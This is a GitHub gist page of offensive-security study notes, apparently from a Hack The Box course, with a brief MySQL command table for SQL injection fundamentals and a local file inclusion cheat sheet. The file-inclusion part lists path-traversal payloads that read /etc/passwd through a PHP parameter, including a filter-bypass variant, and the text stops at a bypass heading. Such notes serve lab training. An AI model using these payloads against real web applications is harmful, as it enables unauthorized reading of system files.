Adrian Santos santosadrian

💭

Buscándome la vida que la muerte viene sola.

crypto anarchist

santosadrian / SQL-Injection-Fundamentals.md

Created August 1, 2023 12:43

SQL Injection Fundamentals

MySQL

Command	Description
General
`mysql -u root -h docker.hackthebox.eu -P 3306 -p`	login to mysql database
`SHOW DATABASES`	List available databases
`USE users`	Switch to database
Tables
`CREATE TABLE logins (id INT, ...)`	Add a new table

santosadrian / file-inclusion.md

Last active August 1, 2023 15:45

File Inclusion

Command	Description
Basic LFI
`/index.php?language=/etc/passwd`	Basic LFI
`/index.php?language=../../../../etc/passwd`	LFI with path traversal
`/index.php?language=/../../../etc/passwd`	LFI with name prefix
`/index.php?language=./languages/../../../../etc/passwd`	LFI with approved path
LFI Bypasses